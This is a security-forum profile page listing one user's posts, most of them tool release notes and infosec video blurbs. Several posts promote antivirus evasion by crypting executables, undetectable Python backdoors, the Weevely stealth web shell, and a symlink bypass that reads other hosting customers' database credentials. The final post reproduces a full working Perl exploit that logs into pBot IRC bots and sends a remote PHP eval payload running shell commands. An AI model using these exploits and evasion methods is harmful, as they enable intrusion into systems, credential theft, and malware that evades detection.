Wubi
Active Members-
Posts
893 -
Joined
-
Last visited
-
Days Won
17
Everything posted by Wubi
-
There are different methods like Hex Editing, Signature Altering, Polymorphism implementation, Encrypting, Binding etc. I will show you a simple method to make your executable undetectable. I cannot guarantee that the executable will be fully undetectable since some antivirus may detect it. I am using a software call PC Guard for Win32, which is software protection software. We use it to encrypt our malicious executable to make it undetectable. Ajin Abraham facebook.com/AjinHacker Kerala Cyber Force | KCF - Learn | Share | Contribute
-
Hacking Windows 8 and creating a backdoor for maintaining access.
-
Description: A proof of concept for cross-platform malware. I'm demonstrating how to design one virus which infects OSX, Windows 8 and Oracle Linux, by using GraVitoN malware development framework. I think this first official virus for windows 8!!! GraVitoN | A Cross Pltaform Malware Development Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
Description: Mirkov4 is a remote administration tool that operates over http. Any standard web browser (IE, Firefox, Chrome etc.) can be used to perform a wide range of operations on the remote machine running Mirkov4: * navigate through the disk and network drives * see the user's desktop, send keys and mouse events * download, upload or delete files * execute arbitrary commands in a given directory * display and kill currently running processes Ajin Abraham Kerala Cyber Force www.keralacyberforce.in Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
Description: 1st Watch this video for how to create fully undetectable backdoor using Python language. Create Undetectable Backdoor In Python After watching this video Create Undetectable Backdoor In Python, and after creating a backdoor how to implement AES encryption to our custom backdoor. So in this video you will learn how to write an encryption script. He is writing this script for securing our traffic from victim to attacker. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
Description: This video is all about Digital forensics, this is a very good video for who wants to understand, what digital forensics is and how to start using tools and where? Especially if you are working as a digital forensics investigation (Fresher) so where you have to start etc... And see the difference in free tools and commercial tools why we want commercial tools for deeper investigation. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Digital Forensic Tools: When to Use What on Vimeo
-
Nu exista niciun motiv pentru care sa nu se lucreze cu date sensibile pe PoS. Nu se retin log-uri, navigarea in browserul PoS se face prin serverul de proxy anonim al PoS ce nu retine log-uri. Se va seta conexiune SSL cat de curand. Eventual si alte metode de securitate a datelor utilizatorilor.
-
Our first post about the Microsoft Attack Surface Analyzer can be found here. Finally today, an update - Attack Surface Analyzer 1.0 – was released! This release includes performance enhancements and bug fixes to improve the user experience. Through improvements in the code, the number of false positives were reduced and GUI performance was increased! This release also includes in-depth documentation and guidance to improve ease of use. Known Issues: When scanning a system with >=100 GB of files, Attack Surface Analyzer will collect the data from the system. It will crash with “System.OutOfMemoryException” thrown. A workaround is to install Attack Surface Analyzer on a freshly built system to minimize the size of the data collected and analyzed. In the Attack Surfaces tab of the Report.html file, if you collapse a section you cannot navigate to any of the subsection from the Table of Contents links. A workaround for this is to not collapse the sections in the report.html file. Download Attack Surface Analyzer: Attack Surface Analyzer 1.0 – Attack_Surface_Analyzer_x86.msi/Attack_Surface_Analyzer_x64.msi Sursa: PenTestIT — Your source for Information Security Related information!
- 1 reply
-
- 1
-
If you have Ubisoft game installed, you are easily hackable from a web-browser. A critical vulnerability in Ubisoft Uplay web-browser plugin which gets installed by all current Ubisoft games List of games Assassin’s Creed II, Assassin’s Creed: Brotherhood, Assassin’s Creed: Project Legacy, Assassin’s Creed Revelations, Assassin’s Creed III, Beowulf: The Game, Brothers In Arms: Furious 4, Call Of Juarez: The Cartel, Driver: San Francisco, Heroes Of Might And Magic VI, Just Dance 3, Prince Of Persia: The Forgotten Sands, Pure Football, R.U.S.E., Shaun White Skateboarding, Silent Hunter 5: Battle Of The Atlantic, The Settlers 7: Paths To A Kingdom, Tom Clancy’s H.A.W.X. 2, Tom Clancy’s Ghost Recon: Future Soldier Tom Clancy’s Splinter Cell: Conviction is public now allowing a hacker to remotely launch and install programs on a user computer POC details All we need to do is to make user-click on a link and use these simple lines of code to attack. If you have an Ubisoft game installed a proof-of-concept is available Click here to read more on POC Sursa: POC on Ubisoft games exploit — PenTestIT
-
Description: This video introduces the Cortana scripting language for Cobalt Strike and Armitage. Cortana allows you to write scripts that automate red team tasks and extend Armitage and Cobalt Strike with new features. In this video, you'll see an auto process kill bot and a sniffer script demoed. Cortana: real-time collaborative hacking… with bots ? Strategic Cyber LLC Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
by Graham Cluley on August 2, 2012 Facebook has released statistics showing that it believes there are more than 83 million fake accounts on its social network. Some 8.7% of the site's 955 million users are believed to be bogus, according to documents that the company filed with the Securities and Exchange Commission (SEC) earlier this week. According to Facebook, the biggest proportion of the bogus accounts (4.8% of all accounts on the network) belong to users who maintain duplicate accounts. Why might you want to have more than one account? Well, I know a primary school teacher who doesn't want her pupils to see what she gets up to socially (and the drunken pictures her friends might post of her at wild parties) and so she maintains one "professional" account (under her real name) and another "personal" account under a nickname. Of course, such behaviour (the ownership of more than one account, not the partying) is in violation of Facebook's terms & conditions. That clearly isn't bothering some 45 million users, however. Then there are what Facebook calls "user-misclassified" accounts. Those users who have created personal profiles for their business, their boat, their pet, or some other non-human entity. Facebook claims that approximately 2.4% of the accounts on its network are mis-classified in this way, and that really the owners of those almost 23 million accounts should create a page for their business/pet/etc instead. Finally, and perhaps of most interest to Naked Security's readers, we come to the 1.5% of accounts that are categorised as "undesirable". Over 14 million Facebook accounts are used for the primary purpose of sending out spam or other malicious links and content. Why does this matter? Well, clearly all Facebook users are interested in the site becoming a safer place, and the level of spam and malicious links being minimised. But more than that, companies who are considering advertising on the social network want to be sure that any "likes" they receive are from genuine users, not bogus accounts. Interestingly, Facebook says that the percentage of fake accounts is higher in developing markets such as Indonesia and Turkey, than in countries where the social network is more established. That was certainly experience of BBC News Technology reporter Rory Cellan-Jones, who recently explored the value of Facebook advertising by creating a page about "Virtual Bagels" and was flooded with fans from Egypt, Indonesia and the Philippines - with many of the accounts obviously false. Of course, it's far from simple for Facebook to determine reliably if every account is fake or not, as anybody can create an account with a bare minimum of credentials. What remains to be seen is whether the proportion of dodgy accounts on Facebook continues to grow, and if the site's advertisers view it as a problem. Sursa: Facebook: There are over 83 million fake accounts on our site [iNFOGRAPHIC] | Naked Security
-
Our first post regarding PacketFence can be found here. A few hours ago, a new release – PacketFence version 3.5.0 – was made available. PacketFence 3.5.0 official change log: New Hardware Support Cisco Catalyst 3560G Netgear GS110 series (SNMP link up/down) Cisco Aironet in Wireless Directory Services (WDS) mode New Features Remediation module for SourceFire 3D (addons/sourcefire) Added portal profile feature that allow to present a custom captive portal depending on the SSID you connect to. Refer to Administration Guide for further details Added a new action to close another violation Added a new Web-based configurator that eases the installation and configuration process of a new PacketFence installation Added support for Suricata IDS (#1141) Enhancements Improved handling of an empty conf/pf.conf configuration file Improved error reporting for dynamic uplink detection on Cisco Interface gateways are no longer required in configuration (#1447) general.caching parameter removed from configuration Major refactoring, cleanup and dependencies removal node.expire now works for VLAN/Inline mode (#1481) Closing expired violations using the release_date (#1476) Excluding the local switch when building the NAS SQL table (#1491) FreeRADIUS configuration is now fully managed (pf/raddb) Use of Nessus XMLRPC to launch the remote scan Possibility to select a policy in nessus by the node category Refactoring of the accounting violations Refactoring of the captive portal templates generation trapping.registration now enabled by default Bug Fixes Wrong information sent by mail for sponsored registration (#1445) DHCP listener watch issue fix (#1490) This is a major release with new features and important bug fixes and is considered ready for production use. Upgrading to PacketFence 3.5.0 is advised. Download PacketFence: PacketFence 3.5.0 - packetfence-3.5.0.tar.gz Sursa: PenTestIT — Your source for Information Security Related information!
-
Our first post about ThreadFix can be found here. A few hours ago, an update - ThreadFix 1.0 beta 20 – was released. This release contains several big fixes. Changes made to ThreadFix: JIRA has been rewritten to use the REST interface Imperva support is now functional Lots of memory improvements in the scan parsing and display pages should allow usage of big scans (tested at ~100,000 vulnerabilities) Font issues should be fixed for Linux reports. Download ThreadFix: ThreadFix 1.0 Beta 20 – ThreadFix_1_0_beta20.zip Sursa: ThreadFix version 1.0 beta 20! — PenTestIT
-
Our first post regarding Ostinato can be found here. A few hours ago, an update – Ostinato version 0.5.1 - was released. We have release after a number of binary packages for operating systems such as Mac OSX Universal binaries, Ubuntu 11.10, Fedora 16, openSUSE 12.1, SLE11 SP2, Mandriva 2011, Fedora 17 and Ubuntu 12.04. Official Ostinato 0.5.1 change log: Link state and improved statistics support for Linux, BSD and Mac OSX Bugfixes Fixed long inter-packet delay bug in interleaved mode due to which stream transmission could not be stopped ( Issue 60 , Issue 72 , Issue 74 ) Fixed long inter-packet delay on some Win32 platforms ( Issue 66 ) Fixed crash at init when pcap wasn’t able to open an interface ( Issue 64 ) Fixed incorrect TCP checksum when it is overridden ( Issue 58 ) Download Ostinato: Ostinato v0.5.1 – ostinato-src-0.5.1.tar.gz/ostinato-bin-win32-0.5.1.zip Sursa: Ostinato version 0.5.1! — PenTestIT
-
BackTrack 5 R3 - Blackhat Edition
Wubi replied to Nytro's topic in Sisteme de operare si discutii hardware
A aparut, insa nu oficial. Au fost distribuite DVD-uri cu versiunea pe 32 biti Gnome a BT5R3 participantilor de la BlackHat. Oficial va aparea pe 13 august. Utilizatorii de R2 pot face actualizarile cu un simplu update. Ce a aparut pe ThePirateBay, este probabil o versiune urcata de unul din participantii la BlackHat. -
Description: This video is to demonstrate how a hacker can hack a shared server using a Symlink Bypass. The attacking can read configuration on other users who are hosting on the same server as the compromised website. First the attack needs to find a vulnerable website so he can get shell to the server to upload the symlinks bypass tool From there the attack has to locate the other users on the same server and then try to figure out where or if there is a configuration ex; wp-config.php It will then open the config.php and save the inside of the config.php as a txt file. From there the attacker would be able to access the victims SQL data base and change the information. Files for this video can be found on ZARABYTE.COM Please be sure to check out the forum if you need help. Programs used: Backtrack 5 RC2 Symlink Bypass user by zarabyte MySQL Interface Shell GNY Shell ZaraByte File Uploader Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
Our first post regarding Bro, the Network Security Monitor can be found here. It has since been updated! We now have Bro 2.1 Beta! New Functionality: Bro now comes with extensive IPv6 support. In addition to Bro itself, the other Bro components have also been made IPv6-aware by default. In particular, significant changes were made to trace-summary, PySubnetTree, and Broccoli to support IPv6. Bro now decapsulates tunnels via its new tunnel framework located in scripts/base/frameworks/tunnels. It currently supports Teredo, AYIYA, IP-in-IP (both IPv4 and IPv6), and SOCKS. Bro now features a flexible input framework that allows users to integrate external information in real-time into Bro while it’s processing network traffic. BroControl now has built-in support for host-based load-balancing when using either PF_RING, Myricom cards, or individual interfaces. Bro now comes with experimental support for two alternative output formats: DataSeries: an efficient binary format for recording structured bulk data. DataSeries is developed and maintained at HP Labs. See doc/logging-dataseries for more information. ElasticSearch: a distributed RESTful, storage engine and search engine built on top of Apache Lucene. It scales very well, both for distributed indexing and distributed searching. Changed Functionality: Changes in dependencies: Bro now requires CMake >= 2.6.3. Bro now links in tcmalloc (part of Google perftools) if found at configure time. Doing so can significantly improve memory and CPU use. The configure switch —enable-brov6 is gone. DNS name lookups performed by Bro now also query AAAA records. The results of the A and AAAA queries for a given hostname are combined such that at the scripting layer, the name resolution can yield a set with both IPv4 and IPv6 addresses. The connection compressor was already deprecated in 2.0 and has now been removed from the code base. We removed the “match” statement, which was no longer used by any of the default scripts, nor was it likely to be used by anybody anytime soon. With that, “match” and “using” are no longer reserved keywords. The syntax for IPv6 literals changed from “2607:f8b0:4009:802::1012” to ”[2607:f8b0:4009:802::1012]”. Bro now spawns threads for doing its logging. From a user’s perspective not much should change, except that the OS may now show a bunch of Bro threads. We renamed the configure option —enable-perftools to —enable-perftools-debug to indicate that the switch is only relevant for debugging the heap. Bro’s ICMP analyzer now handles both IPv4 and IPv6 messages with a joint set of events. The icmp_conn record got a new boolean field ‘v6’ that indicates whether the ICMP message is v4 or v6. Log postprocessor scripts get an additional argument indicating the type of the log writer in use (e.g., “ascii”). BroControl’s make-archive-name script also receives the writer type, but as its 2nd(!) argument. If you’re using a custom version of that script, you need to adapt it. See the shipped version for details. Signature files can now be loaded via the new “@load-sigs” directive. In contrast to the existing (and still supported) signature_files constant, this can be used to load signatures relative to the current script (e.g., “@load-sigs ./foo.sig”). The options “tunnel_port” and “parse_udp_tunnels” have been removed. Bro now supports decapsulating tunnels directly for protocols it understands. ASCII logs now record the time when they were opened/closed at the beginning and end of the file, respectively (wall clock). The options LogAscii::header_prefix and LogAscii::include_header have been renamed to LogAscii::meta_prefix and LogAscii::include_meta, respectively. The ASCII writers “header_*” options have been renamed to “meta_*” (because there’s now also a footer). So you see, Bro 2.1 comes with extensive support for IPv6, tunnel decapsulation, a new input framework for integrating external information in real-time into the processing, support for load-balancing in BroControl, two new experimental log output formats (DataSeries, ElasticSearch), and many more improvements and fixes throughout the code base. Download Bro: Bro 2.1 Beta – bro-2.1-beta.tar.gz Sursa: Bro 2.1 Beta! — PenTestIT
-
http://vimeo.com/41968499# Description: This video is all about Smartphones and Tablets attack. Video Presentation by Emil Kvarnhammar, After Watching this talk you will learn how to attack on smartphone or tablet how hackers are using that tricks on us and stealing our information or data and also recording our messages and how they can control our device to send SMS. The demos will also shows why such attacker likely to be left undetected by antivirus products. About Emil Kvarnhammar : - Emil Kvarnhammar is specialized in mobile platforms, with focus on security and MDM (Mobile Device Management). He has been involved in the development of many different mobile products and hardware related software components. A recent example is as Lead Engineer for the development and optimization of PlayStation™ emulation in Xperia™ Play, at Sony Ericsson in Silicon Valley. Today he is doing security analysis, vulnerability testing and development of mobile software at TrueSec. He also holds courses and seminars about secure application development and MDM. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: ?redev - How attackers attack your smartphones and tablets - Emil Kvarnhammar on Vimeo
-
Description: In this video J. Oquendo shows us how to perform reverse engineering on the RSA SecurityID. In this video he is using some open source forensics tools, In March of this year, RSA - the security division of EMC - had announced they suffered a breach stemming from a "sophisticated attack" on their network systems. The attackers targeted proprietary information on RSA's SecurID two-factor authentication systems, a product designed to prevent unauthorized access to enterprise network systems. Source : - infosecisland Reverse Engineering the RSA Malware Attack Was this the e-mail that took down RSA? - Computerworld Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Reverse Engineering the RSA Malware Attack on Vimeo
-
Description: In this video GFI Software Team Analyzing Flame Malware with Sandbox Technology. This presentation by The GFI Software Flame Taskforce. Sandbox Technology: - Sandbox Technology Malware determination engine and that protect you from the Malware and telling you the Risk levels of that malware. For more information visit: - Malware Analysis with GFI SandBox (formerly CWSandbox) Flame: - Flame malware also known as Flamer, Skywiper, and sKyWIper. This malware discovered in 2012 and flame malware target Microsoft Windows Operating system. Security Experts are telling this malware created for Cyber War. And Secrely information gathering virus. Now, Japan is blaming Israel for the same virus that hit their nuclear computers. Flame can record data files, remotely change settings on computers, turn on PC microphones to record conversations, take screen shots and log instant messaging chats. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Analyzing Flame with Sandbox Technology on Vimeo
-
Description: In this video you will learn how to setup Reaver pro wireless cracking toolkit in Vmware. Reaver Pro : - 1st question in your mind is what is Reaver Pro*, Reaver Pro is toolkit developed by eveloped by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community. Source : - Tactical Network Solutions - Products Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
Description: Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Weevely is currently included in Backtrack and Backbox and other Linux distributions for penetration testing. In this video iam just showing a demonstration on using weevely. ================================================ Like us on facebook : HackWithMak | Facebook Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
-
If you would like to concentrate on your daily stuff, Stayfocused is your choice. We can use it for tracking our projects and daily operational tasks. Features of Stayfocused Launch Apps: Choose any apps needed to complete your task. Open Sites: Open any websites needed to complete your current task. Open Docs: Open any pertinent documents in their default applications. Hide Windows: Hide the windows that are not needed to your tasks. Hide Icons: Hide desktop icons to help you focus on your tasks better. Set Wallpaper: Set a nice wallpaper to help you focus on your task better. View Report: View the report that shows how you have spent your time. It’s a freeware. Download Stayfocused: Stayfocused – Stayfocused_2.0.1_setup.exe Sursa: Stayfocused tool to Helps work and study more productively — PenTestIT
-
pBot Remote Code Execution [table=width: 500, class: grid] [tr] [td]EDB-ID: 201682[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: bwall[/td] [td]Published: 2012-08-01[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] #!/usr/bin/perl # Exploit Title: pBot Remote Code Execution ("*" hostauth) # Date: 31.07.2012 # Exploit Author: @bwallHatesTwits # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack) # Version: Various versions # Tested on: Linux 3.2 use IO::Socket; use IO::Select; use IO::Socket::INET; use Socket; my $nickname = "BotSlayer"; my $ident = "BotSlayer"; my $fullname = "BotSlayer"; $sel_client = IO::Select->new(); #configuration values from the bot source $ircserver = "localhost"; #"server" $ircserverpass = ""; #"pass" my $ircport = "6667"; #"port" #if "key" is set, then add a space and the password to the chan name my @channels = ("#anonbxu"); #"chan" and "chan2" $botPass = "hello"; #"password" $botTrigger = "."; #"trigger" #hostauth must be "*" $loginCMD = "user"; #usually user or login #payload - PHP code to run #This version deletes the bots originating script, and dies $phpEval = "shell_exec(\"rm -f \".\$_SERVER['SCRIPT_NAME']);exit();"; $channelCount = scalar(@channels); sub onJoin { my $channel = shift; $channel = substr($channel, 1); print "Joined $channel\n"; say($channel, $botTrigger.$loginCMD." $botPass"); sleep(1); say($channel, $botTrigger."eval \@BallastSec ".$phpEval); print "Payload delivered\n"; tryQuit(); } sub tryQuit { $channelCount--; if($channelCount == 0) { quit("whomp wha"); } } sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub conn { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; if($ircserverpass != "") { sendraw("PASS ".$ircserverpass); } sendraw("NICK ".$mynick); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; print $servarg."\n"; if ($servarg =~ /^PING \.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?) JOIN (.+)/) { my $channel = $4; onJoin($channel); } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION BotSlayer by Ballast Security\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\.+?)\!(.+?)\@(.+?)\s+NICK\s+\\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach(@channels) { sendraw("JOIN $_"); } } } my $line_temp; while(1) { while (!(keys(%irc_servers))) { conn($nickname, $ircserver, $ircport); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//; for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; parse("$line"); } } } sub say { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]"); } sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub join { sendraw("JOIN $_[0]"); } sub part { sendraw("PART $_[0]"); } sub quit { sendraw("QUIT :$_[0]"); exit; }